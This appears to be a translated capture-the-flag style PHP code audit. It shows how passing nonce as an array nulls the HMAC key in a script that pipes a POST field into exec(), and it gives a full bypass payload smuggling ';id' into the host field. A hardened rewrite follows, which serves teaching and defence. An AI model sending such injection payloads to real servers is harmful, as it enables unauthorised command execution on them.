PHP code audit - a small problem

PHP Code:

<?php

if (empty($_POST['hmac']) || empty($_POST['host'])) {
    header('HTTP/1.0 400 Bad Request');
    exit;
}

$secret = getenv("SECRET");

// The nonce is mixed into the key; if nonce arrives as an array, hash_hmac() returns NULL here
if (isset($_POST['nonce']))
    $secret = hash_hmac('sha256', $_POST['nonce'], $secret);

$hmac = hash_hmac('sha256', $_POST['host'], $secret);

if ($hmac !== $_POST['hmac']) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// host goes to the shell without any escaping
echo exec("host ".$_POST['host']);
?>


Reading the code: the whole flow is that a POST request supplies host and hmac, the script computes its own HMAC of host and compares it with the submitted hmac, and if the two match it runs echo exec("host ".$_POST['host']);, which means success.


There are two checks:

if (empty($_POST['hmac']) || empty($_POST['host'])) { header('HTTP/1.0 400 Bad Request'); exit; }

if ($hmac !== $_POST['hmac']) { header('HTTP/1.0 403 Forbidden'); exit; }

The second check is the one to focus on, keeping PHP's automatic type conversion in mind; the only variables we control are host and nonce.


When passing parameters, PHP lets you decide not only the value but also its type: you can send nonce=123, or you can send an array with nonce[]=123. Let us try it:

The result is NULL; some PHP versions also emit a warning, but the return value is still NULL. So if we pass nonce as an array, $secret becomes NULL and we know how the next hmac is computed:

We pass the host parameter ;id, so in the end host ;id is executed, which prints the current user name.


Ultimately, the POST data we need is:

 hmac=58dedd736c5af324a198c6c663e569df59691854d1f53d704bdbce40f1d139c1&host=;id&nonce[]=1
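As an added example (not code from the write-up or the challenge), here is a hardened rewrite of the same script that closes both issues the audit relies on: it rejects any non-string nonce or host before hash_hmac() sees them (on PHP 7 an array makes hash_hmac() return NULL with a warning; PHP 8 throws a TypeError instead), compares the MAC in constant time, and only passes a validated, shell-escaped hostname to exec(). It assumes the same POST fields and SECRET environment variable as the original.

```php
<?php
// Hardened rewrite of the audited script (added example, not the original code).
// Assumes POST fields hmac, host and optional nonce, plus a SECRET environment variable.
declare(strict_types=1);

function compute_hmac(string $host, string $secret, ?string $nonce): string
{
    // Derive the per-request key only from a string nonce; arrays never reach hash_hmac().
    $key = $nonce === null ? $secret : hash_hmac('sha256', $nonce, $secret);
    return hash_hmac('sha256', $host, $key);
}

function valid_hostname(string $host): bool
{
    // Letters, digits, hyphens and dots only: this excludes ';', spaces and other shell metacharacters.
    return (bool) preg_match('/^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$/', $host);
}

function authorize(array $post, string $secret): bool
{
    // Anything that is not a non-empty string is refused; nonce[]=1 stops here instead of becoming NULL.
    foreach (['hmac', 'host'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || $post[$field] === '') {
            return false;
        }
    }
    $nonce = $post['nonce'] ?? null;
    if ($nonce !== null && !is_string($nonce)) {
        return false;
    }
    if (!valid_hostname($post['host'])) {
        return false;
    }
    $expected = compute_hmac($post['host'], $secret, $nonce);
    // Constant-time comparison; the original's !== leaks timing information.
    return hash_equals($expected, $post['hmac']);
}

$secret = getenv('SECRET');
if ($secret === false || $secret === '') {
    // Refuse to run with a missing key rather than silently using an empty one.
    header('HTTP/1.0 500 Internal Server Error');
    exit;
}
if (!authorize($_POST, $secret)) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}
// escapeshellarg() is a second layer even though valid_hostname() already rejects metacharacters.
echo exec('host ' . escapeshellarg($_POST['host']));
```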


Source: www.cnblogs.com/Risk2S/p/12015809.html